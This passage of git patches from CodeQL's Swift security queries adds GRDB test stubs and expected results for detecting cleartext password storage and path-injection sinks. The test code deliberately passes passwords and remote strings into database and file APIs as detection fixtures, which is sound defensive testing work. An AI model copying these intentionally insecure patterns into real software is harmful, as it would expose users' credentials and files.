This operation stores '[post] a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:34:11:34:11 | myPassword : | myPassword | | testRealm.swift:42:2:42:2 | c | testRealm.swift:42:11:42:11 | myPassword : | testRealm.swift:42:2:42:2 | [post] c | This operation stores '[post] c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:42:11:42:11 | myPassword : | myPassword | | testRealm.swift:52:2:52:3 | ...! | testRealm.swift:52:12:52:12 | myPassword : | testRealm.swift:52:2:52:3 | [post] ...! | This operation stores '[post] ...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:52:12:52:12 | myPassword : | myPassword | diff --git a/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected b/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected index 3c61ec86e95..3f16b9d399b 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected @@ -20,6 +20,57 @@ | testCoreData.swift:91:10:91:10 | passwd | label:passwd, type:credential | | testCoreData.swift:92:10:92:10 | passwd | label:passwd, type:credential | | testCoreData.swift:93:10:93:10 | passwd | label:passwd, type:credential | +| testGRDB.swift:73:57:73:57 | password | label:password, type:credential | +| testGRDB.swift:76:43:76:43 | password | label:password, type:credential | +| testGRDB.swift:81:45:81:45 | password | label:password, type:credential | +| testGRDB.swift:83:45:83:45 | password | label:password, type:credential | +| testGRDB.swift:85:45:85:45 | password | label:password, type:credential | +| testGRDB.swift:87:45:87:45 | password | label:password, type:credential | +| testGRDB.swift:92:38:92:38 | password | label:password, type:credential | +| testGRDB.swift:95:37:95:37 | password | label:password, type:credential | +| testGRDB.swift:100:73:100:73 | password | label:password, type:credential | +| testGRDB.swift:101:73:101:73 | password | label:password, type:credential | +| testGRDB.swift:107:53:107:53 | password | label:password, type:credential | +| testGRDB.swift:109:53:109:53 | password | label:password, type:credential | +| testGRDB.swift:111:52:111:52 | password | label:password, type:credential | +| testGRDB.swift:116:48:116:48 | password | label:password, type:credential | +| testGRDB.swift:118:48:118:48 | password | label:password, type:credential | +| testGRDB.swift:121:45:121:45 | password | label:password, type:credential | +| testGRDB.swift:123:45:123:45 | password | label:password, type:credential | +| testGRDB.swift:126:45:126:45 | password | label:password, type:credential | +| testGRDB.swift:128:45:128:45 | password | label:password, type:credential | +| testGRDB.swift:131:45:131:45 | password | label:password, type:credential | +| testGRDB.swift:133:45:133:45 | password | label:password, type:credential | +| testGRDB.swift:138:69:138:69 | password | label:password, type:credential | +| testGRDB.swift:140:69:140:69 | password | label:password, type:credential | +| testGRDB.swift:143:66:143:66 | password | label:password, type:credential | +| testGRDB.swift:145:66:145:66 | password | label:password, type:credential | +| testGRDB.swift:148:66:148:66 | password | label:password, type:credential | +| testGRDB.swift:150:66:150:66 | password | label:password, type:credential | +| testGRDB.swift:153:66:153:66 | password | label:password, type:credential | +| testGRDB.swift:155:66:155:66 | password | label:password, type:credential | +| testGRDB.swift:160:60:160:60 | password | label:password, type:credential | +| testGRDB.swift:161:51:161:51 | password | label:password, type:credential | +| testGRDB.swift:164:60:164:60 | password | label:password, type:credential | +| testGRDB.swift:165:51:165:51 | password | label:password, type:credential | +| testGRDB.swift:169:57:169:57 | password | label:password, type:credential | +| testGRDB.swift:170:48:170:48 | password | label:password, type:credential | +| testGRDB.swift:173:57:173:57 | password | label:password, type:credential | +| testGRDB.swift:174:48:174:48 | password | label:password, type:credential | +| testGRDB.swift:178:57:178:57 | password | label:password, type:credential | +| testGRDB.swift:179:48:179:48 | password | label:password, type:credential | +| testGRDB.swift:182:57:182:57 | password | label:password, type:credential | +| testGRDB.swift:183:48:183:48 | password | label:password, type:credential | +| testGRDB.swift:187:57:187:57 | password | label:password, type:credential | +| testGRDB.swift:188:48:188:48 | password | label:password, type:credential | +| testGRDB.swift:191:57:191:57 | password | label:password, type:credential | +| testGRDB.swift:192:48:192:48 | password | label:password, type:credential | +| testGRDB.swift:198:30:198:30 | password | label:password, type:credential | +| testGRDB.swift:201:24:201:24 | password | label:password, type:credential | +| testGRDB.swift:206:67:206:67 | password | label:password, type:credential | +| testGRDB.swift:208:81:208:81 | password | label:password, type:credential | +| testGRDB.swift:210:85:210:85 | password | label:password, type:credential | +| testGRDB.swift:212:99:212:99 | password | label:password, type:credential | | testRealm.swift:34:11:34:11 | myPassword | label:myPassword, type:credential | | testRealm.swift:42:11:42:11 | myPassword | label:myPassword, type:credential | | testRealm.swift:52:12:52:12 | myPassword | label:myPassword, type:credential | diff --git a/swift/ql/test/query-tests/Security/CWE-311/testGRDB.swift b/swift/ql/test/query-tests/Security/CWE-311/testGRDB.swift new file mode 100644 index 00000000000..e0c6d7a4907 --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-311/testGRDB.swift @@ -0,0 +1,214 @@ +// --- stubs --- + +struct StatementArguments : ExpressibleByArrayLiteral { + init(arrayLiteral: (String)?...) {} +} + +protocol RowAdapter {} + +struct QueryInterfaceRequest {} + +class Database { + func allStatements(sql: String, arguments: StatementArguments? = nil) -> SQLStatementCursor { return SQLStatementCursor(database: self, sql: "", arguments: nil) } + func execute(sql: String, arguments: StatementArguments = StatementArguments()) {} +} + +class SQLRequest { + init(sql: String, arguments: StatementArguments = StatementArguments(), adapter: (any RowAdapter)? = nil, cached: Bool = false) {} +} + +class SQL { + init(sql: String, arguments: StatementArguments = StatementArguments()) {} + func append(sql: String, arguments: StatementArguments = StatementArguments()) {} +} + +class SQLStatementCursor { + init(database: Database, sql: String, arguments: StatementArguments?, prepFlags: CUnsignedInt = 0) {} +} + +class TableRecord { + static func select(sql: String, arguments: StatementArguments = StatementArguments()) -> QueryInterfaceRequest { QueryInterfaceRequest() } + static func select(sql: String, arguments: StatementArguments = StatementArguments(), as: RowDecoder.Type = RowDecoder.self) -> QueryInterfaceRequest{ QueryInterfaceRequest() } + static func filter(sql: String, arguments: StatementArguments = StatementArguments()) -> QueryInterfaceRequest { QueryInterfaceRequest() } + static func order(sql: String, arguments: StatementArguments = StatementArguments()) -> QueryInterfaceRequest { QueryInterfaceRequest() } +} + +class Row { + func fetchCursor(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchAll(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchSet(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchOne(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} +} + +class DatabaseValueConvertible { + func fetchCursor(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchAll(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchSet(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchOne(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} +} + +class FetchableRecord { + func fetchCursor(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchCursor(_: Statement, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchAll(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchAll(_: Statement, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchSet(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchSet(_: Statement, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchOne(_: Statement, sql: String, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} + func fetchOne(_: Statement, arguments: StatementArguments? = nil, adapter: (any RowAdapter)? = nil) {} +} + +class Statement { + func execute(arguments: StatementArguments? = nil) {} + func setArguments(_: StatementArguments) {} +} + +class CommonTableExpression { + init(recursive: Bool = false, named: String, columns: [String]? = nil, sql: String, arguments: StatementArguments = StatementArguments()) {} +} + +// --- tests --- + +func test(database: Database, password: String, harmless: String) { + let _ = database.allStatements(sql: "", arguments: [password]) // BAD + let _ = database.allStatements(sql: "", arguments: [harmless]) // GOOD + + database.execute(sql: "", arguments: [password]) // BAD + database.execute(sql: "", arguments: [harmless]) // GOOD +} + +func testSqlRequest(password: String, harmless: String) { + let _ = SQLRequest(sql: "", arguments: [password]) // BAD + let _ = SQLRequest(sql: "", arguments: [harmless]) // GOOD + let _ = SQLRequest(sql: "", arguments: [password], adapter: nil) // BAD + let _ = SQLRequest(sql: "", arguments: [harmless], adapter: nil) // GOOD + let _ = SQLRequest(sql: "", arguments: [password], cached: false) // BAD + let _ = SQLRequest(sql: "", arguments: [harmless], cached: false) // GOOD + let _ = SQLRequest(sql: "", arguments: [password], adapter: nil, cached: false) // BAD + let _ = SQLRequest(sql: "", arguments: [harmless], adapter: nil, cached: false) // GOOD +} + +func test(sql: SQL, password: String, harmless: String) { + let _ = SQL(sql: "", arguments: [password]) // BAD + let _ = SQL(sql: "", arguments: [harmless]) // GOOD + + sql.append(sql: "", arguments: [password]) // BAD + sql.append(sql: "", arguments: [harmless]) // GOOD +} + +func testSqlStatementCursor(database: Database, password: String, harmless: String) { + let _ = SQLStatementCursor(database: database, sql: "", arguments: [password]) // BAD + let _ = SQLStatementCursor(database: database, sql: "", arguments: [password], prepFlags: 0) // BAD + let _ = SQLStatementCursor(database: database, sql: "", arguments: [harmless]) // GOOD + let _ = SQLStatementCursor(database: database, sql: "", arguments: [harmless], prepFlags: 0) // GOOD +} + +func testTableRecord(password: String, harmless: String) { + let _ = TableRecord.select(sql: "", arguments: [password]) // BAD + let _ = TableRecord.select(sql: "", arguments: [harmless]) // GOOD + let _ = TableRecord.filter(sql: "", arguments: [password]) // BAD + let _ = TableRecord.filter(sql: "", arguments: [harmless]) // GOOD + let _ = TableRecord.order(sql: "", arguments: [password]) // BAD + let _ = TableRecord.order(sql: "", arguments: [harmless]) // GOOD +} + +func test(row: Row, stmt: Statement, password: String, harmless: String) { + row.fetchCursor(stmt, sql: "", arguments: [password]) // BAD + row.fetchCursor(stmt, sql: "", arguments: [harmless]) // GOOD + row.fetchCursor(stmt, sql: "", arguments: [password], adapter: nil) // BAD + row.fetchCursor(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + + row.fetchAll(stmt, sql: "", arguments: [password]) // BAD + row.fetchAll(stmt, sql: "", arguments: [harmless]) // GOOD + row.fetchAll(stmt, sql: "", arguments: [password], adapter: nil) // BAD + row.fetchAll(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + + row.fetchSet(stmt, sql: "", arguments: [password]) // BAD + row.fetchSet(stmt, sql: "", arguments: [harmless]) // GOOD + row.fetchSet(stmt, sql: "", arguments: [password], adapter: nil) // BAD + row.fetchSet(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + + row.fetchOne(stmt, sql: "", arguments: [password]) // BAD + row.fetchOne(stmt, sql: "", arguments: [harmless]) // GOOD + row.fetchOne(stmt, sql: "", arguments: [password], adapter: nil) // BAD + row.fetchOne(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD +} + +func test(databaseValueConvertible: DatabaseValueConvertible, stmt: Statement, password: String, harmless: String) { + databaseValueConvertible.fetchCursor(stmt, sql: "", arguments: [password]) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: "", arguments: [harmless]) // GOOD + databaseValueConvertible.fetchCursor(stmt, sql: "", arguments: [password], adapter: nil) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + + databaseValueConvertible.fetchAll(stmt, sql: "", arguments: [password]) // BAD + databaseValueConvertible.fetchAll(stmt, sql: "", arguments: [harmless]) // GOOD + databaseValueConvertible.fetchAll(stmt, sql: "", arguments: [password], adapter: nil) // BAD + databaseValueConvertible.fetchAll(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + + databaseValueConvertible.fetchSet(stmt, sql: "", arguments: [password]) // BAD + databaseValueConvertible.fetchSet(stmt, sql: "", arguments: [harmless]) // GOOD + databaseValueConvertible.fetchSet(stmt, sql: "", arguments: [password], adapter: nil) // BAD + databaseValueConvertible.fetchSet(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + + databaseValueConvertible.fetchOne(stmt, sql: "", arguments: [password]) // BAD + databaseValueConvertible.fetchOne(stmt, sql: "", arguments: [harmless]) // GOOD + databaseValueConvertible.fetchOne(stmt, sql: "", arguments: [password], adapter: nil) // BAD + databaseValueConvertible.fetchOne(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD +} + +func test(fetchableRecord: FetchableRecord, stmt: Statement, password: String, harmless: String) { + fetchableRecord.fetchCursor(stmt, sql: "", arguments: [password]) // BAD + fetchableRecord.fetchCursor(stmt, arguments: [password]) // BAD + fetchableRecord.fetchCursor(stmt, sql: "", arguments: [harmless]) // GOOD + fetchableRecord.fetchCursor(stmt, arguments: [harmless]) // GOOD + fetchableRecord.fetchCursor(stmt, sql: "", arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchCursor(stmt, arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchCursor(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + fetchableRecord.fetchCursor(stmt, arguments: [harmless], adapter: nil) // GOOD + + fetchableRecord.fetchAll(stmt, sql: "", arguments: [password]) // BAD + fetchableRecord.fetchAll(stmt, arguments: [password]) // BAD + fetchableRecord.fetchAll(stmt, sql: "", arguments: [harmless]) // GOOD + fetchableRecord.fetchAll(stmt, arguments: [harmless]) // GOOD + fetchableRecord.fetchAll(stmt, sql: "", arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchAll(stmt, arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchAll(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + fetchableRecord.fetchAll(stmt, arguments: [harmless], adapter: nil) // GOOD + + fetchableRecord.fetchSet(stmt, sql: "", arguments: [password]) // BAD + fetchableRecord.fetchSet(stmt, arguments: [password]) // BAD + fetchableRecord.fetchSet(stmt, sql: "", arguments: [harmless]) // GOOD + fetchableRecord.fetchSet(stmt, arguments: [harmless]) // GOOD + fetchableRecord.fetchSet(stmt, sql: "", arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchSet(stmt, arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchSet(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + fetchableRecord.fetchSet(stmt, arguments: [harmless], adapter: nil) // GOOD + + fetchableRecord.fetchOne(stmt, sql: "", arguments: [password]) // BAD + fetchableRecord.fetchOne(stmt, arguments: [password]) // BAD + fetchableRecord.fetchOne(stmt, sql: "", arguments: [harmless]) // GOOD + fetchableRecord.fetchOne(stmt, arguments: [harmless]) // GOOD + fetchableRecord.fetchOne(stmt, sql: "", arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchOne(stmt, arguments: [password], adapter: nil) // BAD + fetchableRecord.fetchOne(stmt, sql: "", arguments: [harmless], adapter: nil) // GOOD + fetchableRecord.fetchOne(stmt, arguments: [harmless], adapter: nil) // GOOD +} + +func test(stmt: Statement, password: String, harmless: String) { + stmt.execute(arguments: [password]) // BAD + stmt.execute(arguments: [harmless]) // GOOD + + stmt.setArguments([password]) // BAD + stmt.setArguments([harmless]) // GOOD +} + +func testCommonTableExpression(password: String, harmless: String) { + let _ = CommonTableExpression(named: "", sql: "", arguments: [password]) // BAD + let _ = CommonTableExpression(named: "", sql: "", arguments: [harmless]) // GOOD + let _ = CommonTableExpression(named: "", columns: nil, sql: "", arguments: [password]) // BAD + let _ = CommonTableExpression(named: "", columns: nil, sql: "", arguments: [harmless]) // GOOD + let _ = CommonTableExpression(recursive: false, named: "", sql: "", arguments: [password]) // BAD + let _ = CommonTableExpression(recursive: false, named: "", sql: "", arguments: [harmless]) // GOOD + let _ = CommonTableExpression(recursive: false, named: "", columns: nil, sql: "", arguments: [password]) // BAD + let _ = CommonTableExpression(recursive: false, named: "", columns: nil, sql: "", arguments: [harmless]) // GOOD +} From 07d99bd643ebf17f7493339e4842e07c2c5ec93a Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Fri, 23 Dec 2022 17:03:52 +0100 Subject: [PATCH 075/381] Add path injection sinks --- .../codeql/swift/security/PathInjection.qll | 8 +- .../Security/CWE-022/testPathInjection.swift | 151 +++++++++++------- 2 files changed, 103 insertions(+), 56 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/PathInjection.qll b/swift/ql/lib/codeql/swift/security/PathInjection.qll index 1e0d106b4e1..7b3554cf0ec 100644 --- a/swift/ql/lib/codeql/swift/security/PathInjection.qll +++ b/swift/ql/lib/codeql/swift/security/PathInjection.qll @@ -104,7 +104,13 @@ private class PathInjectionSinks extends SinkModelCsv { ";FileManager;true;replaceItemAtURL(originalItemURL:withItemAtURL:backupItemName:options:);;;Argument[0..1];path-injection", ";NIOFileHandle;true;init(descriptor:);;;Argument[0];path-injection", ";NIOFileHandle;true;init(path:mode:flags:);;;Argument[0];path-injection", - ";NIOFileHandle;true;init(path:);;;Argument[0];path-injection" + ";NIOFileHandle;true;init(path:);;;Argument[0];path-injection", + // GRDB + ";Database;true;init(path:description:configuration:);;;Argument[0];path-injection", + ";DatabasePool;true;init(path:configuration:);;;Argument[0];path-injection", + ";DatabaseQueue;true;init(path:configuration:);;;Argument[0];path-injection", + ";DatabaseSnapshotPool;true;init(path:configuration:);;;Argument[0];path-injection", + ";SerializedDatabase;true;init(path:configuration:defaultLabel:purpose:);;;Argument[0];path-injection" ] } } diff --git a/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift b/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift index 8e97433811a..1d9145a9e97 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift +++ b/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift @@ -91,6 +91,30 @@ class FileManager { func replaceItemAtURL(originalItemURL: NSURL, withItemAtURL: NSURL, backupItemName: String?, options: FileManager.ItemReplacementOptions) -> NSURL? { return nil } } +// GRDB + +struct Configuration {} + +class Database { + init(path: String, description: String, configuration: Configuration) {} +} + +class DatabasePool { + init(path: String, configuration: Configuration) {} +} + +class DatabaseQueue { + init(path: String, configuration: Configuration) {} +} + +class DatabaseSnapshotPool { + init(path: String, configuration: Configuration) {} +} + +class SerializedDatabase { + init(path: String, configuration: Configuration = Configuration(), defaultLabel: String, purpose: String? = nil) {} +} + // --- tests --- func test() { @@ -100,65 +124,82 @@ func test() { let safeUrl = URL(string: "")! let safeNsUrl = NSURL(string: "")! - Data("").write(to: remoteUrl, options: []) // $ hasPathInjection=97 + Data("").write(to: remoteUrl, options: []) // $ hasPathInjection=121 let nsData = NSData() - let _ = nsData.write(to: remoteUrl, atomically: false) // $ hasPathInjection=97 - nsData.write(to: remoteUrl, options: []) // $ hasPathInjection=97 - let _ = nsData.write(toFile: remoteString, atomically: false) // $ hasPathInjection=97 - nsData.write(toFile: remoteString, options: []) // $ hasPathInjection=97 + let _ = nsData.write(to: remoteUrl, atomically: false) // $ hasPathInjection=121 + nsData.write(to: remoteUrl, options: []) // $ hasPathInjection=121 + let _ = nsData.write(toFile: remoteString, atomically: false) // $ hasPathInjection=121 + nsData.write(toFile: remoteString, options: []) // $ hasPathInjection=121 let fm = FileManager() - let _ = fm.contentsOfDirectory(at: remoteUrl, includingPropertiesForKeys: [], options: []) // $ hasPathInjection=97 - let _ = fm.contentsOfDirectory(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.enumerator(at: remoteUrl, includingPropertiesForKeys: [], options: [], errorHandler: nil) // $ hasPathInjection=97 - let _ = fm.enumerator(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.subpathsOfDirectory(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.subpaths(atPath: remoteString) // $ hasPathInjection=97 - fm.createDirectory(at: remoteUrl, withIntermediateDirectories: false, attributes: [:]) // $ hasPathInjection=97 - let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=97 - let _ = fm.createFile(atPath: remoteString, contents: nil, attributes: [:]) // $ hasPathInjection=97 - fm.removeItem(at: remoteUrl) // $ hasPathInjection=97 - fm.removeItem(atPath: remoteString) // $ hasPathInjection=97 - fm.trashItem(at: remoteUrl, resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=97 - let _ = fm.replaceItemAt(remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: []) // $ hasPathInjection=97 - let _ = fm.replaceItemAt(safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: []) // $ hasPathInjection=97 - fm.replaceItem(at: remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=97 - fm.replaceItem(at: safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=97 - fm.copyItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=97 - fm.copyItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=97 - fm.copyItem(atPath: remoteString, toPath: "") // $ hasPathInjection=97 - fm.copyItem(atPath: "", toPath: remoteString) // $ hasPathInjection=97 - fm.moveItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=97 - fm.moveItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=97 - fm.moveItem(atPath: remoteString, toPath: "") // $ hasPathInjection=97 - fm.moveItem(atPath: "", toPath: remoteString) // $ hasPathInjection=97 - fm.createSymbolicLink(at: remoteUrl, withDestinationURL: safeUrl) // $ hasPathInjection=97 - fm.createSymbolicLink(at: safeUrl, withDestinationURL: remoteUrl) // $ hasPathInjection=97 - fm.createSymbolicLink(atPath: remoteString, withDestinationPath: "") // $ hasPathInjection=97 - fm.createSymbolicLink(atPath: "", withDestinationPath: remoteString) // $ hasPathInjection=97 - fm.linkItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=97 - fm.linkItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=97 - fm.linkItem(atPath: remoteString, toPath: "") // $ hasPathInjection=97 - fm.linkItem(atPath: "", toPath: remoteString) // $ hasPathInjection=97 - let _ = fm.destinationOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.fileExists(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.fileExists(atPath: remoteString, isDirectory: UnsafeMutablePointer.init(bitPattern: 0)) // $ hasPathInjection=97 - fm.setAttributes([:], ofItemAtPath: remoteString) // $ hasPathInjection=97 - let _ = fm.contents(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.contentsEqual(atPath: remoteString, andPath: "") // $ hasPathInjection=97 - let _ = fm.contentsEqual(atPath: "", andPath: remoteString) // $ hasPathInjection=97 - let _ = fm.changeCurrentDirectoryPath(remoteString) // $ hasPathInjection=97 - let _ = fm.unmountVolume(at: remoteUrl, options: [], completionHandler: { _ in }) // $ hasPathInjection=97 + let _ = fm.contentsOfDirectory(at: remoteUrl, includingPropertiesForKeys: [], options: []) // $ hasPathInjection=121 + let _ = fm.contentsOfDirectory(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.enumerator(at: remoteUrl, includingPropertiesForKeys: [], options: [], errorHandler: nil) // $ hasPathInjection=121 + let _ = fm.enumerator(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.subpathsOfDirectory(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.subpaths(atPath: remoteString) // $ hasPathInjection=121 + fm.createDirectory(at: remoteUrl, withIntermediateDirectories: false, attributes: [:]) // $ hasPathInjection=121 + let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=121 + let _ = fm.createFile(atPath: remoteString, contents: nil, attributes: [:]) // $ hasPathInjection=121 + fm.removeItem(at: remoteUrl) // $ hasPathInjection=121 + fm.removeItem(atPath: remoteString) // $ hasPathInjection=121 + fm.trashItem(at: remoteUrl, resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=121 + let _ = fm.replaceItemAt(remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 + let _ = fm.replaceItemAt(safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 + fm.replaceItem(at: remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=121 + fm.replaceItem(at: safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=121 + fm.copyItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=121 + fm.copyItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=121 + fm.copyItem(atPath: remoteString, toPath: "") // $ hasPathInjection=121 + fm.copyItem(atPath: "", toPath: remoteString) // $ hasPathInjection=121 + fm.moveItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=121 + fm.moveItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=121 + fm.moveItem(atPath: remoteString, toPath: "") // $ hasPathInjection=121 + fm.moveItem(atPath: "", toPath: remoteString) // $ hasPathInjection=121 + fm.createSymbolicLink(at: remoteUrl, withDestinationURL: safeUrl) // $ hasPathInjection=121 + fm.createSymbolicLink(at: safeUrl, withDestinationURL: remoteUrl) // $ hasPathInjection=121 + fm.createSymbolicLink(atPath: remoteString, withDestinationPath: "") // $ hasPathInjection=121 + fm.createSymbolicLink(atPath: "", withDestinationPath: remoteString) // $ hasPathInjection=121 + fm.linkItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=121 + fm.linkItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=121 + fm.linkItem(atPath: remoteString, toPath: "") // $ hasPathInjection=121 + fm.linkItem(atPath: "", toPath: remoteString) // $ hasPathInjection=121 + let _ = fm.destinationOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.fileExists(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.fileExists(atPath: remoteString, isDirectory: UnsafeMutablePointer.init(bitPattern: 0)) // $ hasPathInjection=121 + fm.setAttributes([:], ofItemAtPath: remoteString) // $ hasPathInjection=121 + let _ = fm.contents(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.contentsEqual(atPath: remoteString, andPath: "") // $ hasPathInjection=121 + let _ = fm.contentsEqual(atPath: "", andPath: remoteString) // $ hasPathInjection=121 + let _ = fm.changeCurrentDirectoryPath(remoteString) // $ hasPathInjection=121 + let _ = fm.unmountVolume(at: remoteUrl, options: [], completionHandler: { _ in }) // $ hasPathInjection=121 // Deprecated methods - let _ = fm.changeFileAttributes([:], atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.directoryContents(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=97 - let _ = fm.createSymbolicLink(atPath: remoteString, pathContent: "") // $ hasPathInjection=97 - let _ = fm.createSymbolicLink(atPath: "", pathContent: remoteString) // $ hasPathInjection=97 - let _ = fm.pathContentOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=97 - let _ = fm.replaceItemAtURL(originalItemURL: remoteNsUrl, withItemAtURL: safeNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=97 - let _ = fm.replaceItemAtURL(originalItemURL: safeNsUrl, withItemAtURL: remoteNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=97 + let _ = fm.changeFileAttributes([:], atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.directoryContents(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=121 + let _ = fm.createSymbolicLink(atPath: remoteString, pathContent: "") // $ hasPathInjection=121 + let _ = fm.createSymbolicLink(atPath: "", pathContent: remoteString) // $ hasPathInjection=121 + let _ = fm.pathContentOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=121 + let _ = fm.replaceItemAtURL(originalItemURL: remoteNsUrl, withItemAtURL: safeNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 + let _ = fm.replaceItemAtURL(originalItemURL: safeNsUrl, withItemAtURL: remoteNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 + + let _ = Database(path: remoteString, description: "", configuration: Configuration()) // $ hasPathInjection=121 + let _ = Database(path: "", description: "", configuration: Configuration()) // Safe + let _ = DatabasePool(path: remoteString, configuration: Configuration()) // $ hasPathInjection=121 + let _ = DatabasePool(path: "", configuration: Configuration()) // Safe + let _ = DatabaseQueue(path: remoteString, configuration: Configuration()) // $ hasPathInjection=121 + let _ = DatabaseQueue(path: "", configuration: Configuration()) // Safe + let _ = DatabaseSnapshotPool(path: remoteString, configuration: Configuration()) // $ hasPathInjection=121 + let _ = DatabaseSnapshotPool(path: "", configuration: Configuration()) // Safe + let _ = SerializedDatabase(path: remoteString, defaultLabel: "") // $ hasPathInjection=121 + let _ = SerializedDatabase(path: "", defaultLabel: "") // Safe + let _ = SerializedDatabase(path: remoteString, defaultLabel: "", purpose: nil) // $ hasPathInjection=121 + let _ = SerializedDatabase(path: "", defaultLabel: "", purpose: nil) // Safe + let _ = SerializedDatabase(path: remoteString, configuration: Configuration(), defaultLabel: "") // $ hasPathInjection=121 + let _ = SerializedDatabase(path: "", configuration: Configuration(), defaultLabel: "") // Safe + let _ = SerializedDatabase(path: remoteString, configuration: Configuration(), defaultLabel: "", purpose: nil) // $ 